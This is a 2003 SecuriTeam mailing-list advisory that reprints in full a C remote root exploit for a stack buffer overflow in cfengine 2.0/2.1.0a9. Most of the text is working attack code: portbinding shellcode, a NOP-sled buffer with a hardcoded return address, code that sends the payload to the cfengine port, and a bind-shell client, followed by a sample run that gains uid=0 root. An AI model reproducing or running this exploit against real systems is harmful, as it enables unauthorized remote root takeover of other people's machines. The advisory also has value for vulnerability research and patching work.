[EXPL] Cfengine Remotely Exploitable Buffer Overflow (Improved Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/02/03
- Previous message: SecuriTeam: "[UNIX] A-CART and A-CART Pro XSS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 Oct 2003 13:59:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cfengine Remotely Exploitable Buffer Overflow (Improved Exploit)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/unixfocus/5LP0P2KB5K.html> Cfengine Remotely
Exploitable Buffer Overflow (net.c), a remotely exploitable buffer
overflow in Cfengine allows remote attackers to cause the program to
execute arbitrary code.
The following exploit code is an improved exploit code for the mentioned
vulnerability.
DETAILS
Exploit:
/* Remote root exploit for cfengine-2.0/2.1.0a9 (stack-based overflow) by
Li0n7
*
* Vulnerability discovered by Nick Cleaton (nick[at]cleaton[dot]net)
*
* Contact me: Li0n7[at]voila[dot]fr
*
* Visit us: www.ioc.fr.st (for those who can speak French)
*
* My world: l7l.linux-fan.com
*
* Here's an example:
* ./exploit -h localhost -p 5308 -t 0
* [+] Building evil string to send (using ret = 0xbf7fec10)...
* [+] Connected to 127.0.0.1 on port 5308
* [+] Payload sent
* [+] Trying to connect to 127.0.0.1 on port 26112...
* [+] Let's rock on!
* Linux Li0n7 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
* uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#define BACK 26112
#define RET 0xbf7fee04
#define PORT 5308
#define ERROR -1
#define BUFFERSIZE 4096
#define SIZE 4136
char shellcode[] = /* bighawk 78 bytes portbinding shellcode */
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";
struct os_ret_addr
{
int num;
char *plat;
long ret;
};
struct os_ret_addr exp_os[]=
{
{0,"slack 9.0",0xbf7fec10},
NULL
};
void
check_error(long host,int port)
{
if(!host)
{
fprintf(stderr,"[-] Host address incorrect,exiting...\n");
exit(ERROR);
}
if(port < 1 || port > 65535)
{
fprintf(stderr,"[-] Port \'%i\' incorrect,exiting...\n",port);
exit(ERROR);
}
return;
}
char
*build(long ret)
{
char *buffer,*ptr;
int i;
long *addr_ptr;
fprintf(stdout,"[+] Building evil string to send (using ret =
0x%x)...\n",ret);
buffer = (char *)malloc(SIZE+1);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
exit(ERROR);
}
ptr = buffer;
memset(ptr,0x90,SIZE);
memcpy(ptr,"3133337",7);
ptr += BUFFERSIZE-strlen(shellcode)-1000;
for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];
ptr += 1000;
addr_ptr = (long *)ptr;
for(i=0;i<120;i=i+4)
*(addr_ptr++) = ret;
ptr = (char *)addr_ptr;
*ptr = 0x0;
return buffer;
}
int
back_connection(long host)
{
struct sockaddr_in s;
u_char sock_buf[4096];
fd_set fds;
int fd,size;
char *command="/bin/uname -a ; /usr/bin/id;\n";
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_port = htons(BACK);
s.sin_addr.s_addr = host;
if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) ==
-1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
return ERROR;
}
fprintf(stdout, "[+] Let's rock on!\n");
size = send(fd, command, strlen(command), 0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
for (;;)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(fd, &fds);
if (select(255, &fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
memset(sock_buf, 0, sizeof(sock_buf));
if (FD_ISSET(fd, &fds))
{
if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
{
fprintf(stderr, "[-] Connection closed by remote
host,exiting...\n");
close(fd);
exit(0);
}
fprintf(stderr, "%s", sock_buf);
}
if (FD_ISSET(0, &fds))
{
read(0, sock_buf, sizeof(sock_buf));
write(fd, sock_buf, strlen(sock_buf));
}
}
return 0;
}
void
set_connection(long host,int port,char *buffer)
{
struct sockaddr_in s;
struct hostent * hoste;
int fd,size;
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_addr.s_addr = host;
s.sin_port = htons(port);
if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Connected to %s on port
%i\n",inet_ntoa(s.sin_addr.s_addr),port);
size = send(fd,buffer,SIZE,0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Payload sent\n[+] Trying to connect to %s on
port %i...\n",inet_ntoa(s.sin_addr.s_addr),BACK);
sleep(2);
close(fd);
}
long resolve_host(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
addr.s_addr = inet_addr(host_name);
if (addr.s_addr == -1)
{
host_ent = gethostbyname(host_name);
if (!host_ent) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr,
host_ent->h_length);
}
return(addr.s_addr);
}
void
die(char *argv)
{
fprintf(stderr,"\tCfengine 2-2.1.0a9 remote root exploit by Li0n7
(http://www.ioc.fr.st)\n");
fprintf(stderr,"\t Vulnerability discovered by Nick Cleaton
(nick@cleaton.net)\n");
fprintf(stderr,"\t My world: http://www.l7l.linux-fan.com\n");
fprintf(stderr,"\t Contact me: Li0n7@voila.fr\n");
fprintf(stderr," Usage: %s -h <host> [-p <port>][-r <retaddr>][-t
<num>]\n",argv);
fprintf(stderr," Example: %s -h localhost -p 5308 -t 0\n\n",argv);
fprintf(stderr," Platforms supported are:\n");
fprintf(stderr," num: %i - %s -
0x%x\n",0,exp_os[0].plat,exp_os[0].ret);
exit(ERROR);
}
int
main(int argc,char *argv[])
{
int i, option, port = PORT;
long ret = RET,host = 0;
char * option_list = "h:p:r:t:", buffer[SIZE+1];
opterr = 0;
if (argc < 4) die(argv[0]);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'h':
host = resolve_host(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'r':
ret = atol(optarg);
break;
case 't':
ret = exp_os[atoi(optarg)].ret;
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
die(argv[0]);
}
check_error(host,port);
strncpy(buffer,build(ret),SIZE+1);
set_connection(host,port,buffer);
back_connection(host);
return 0;
}
/* A poil! */
ADDITIONAL INFORMATION
The information has been provided by <mailto:li0n7@voila.fr> li0n7.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] A-CART and A-CART Pro XSS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
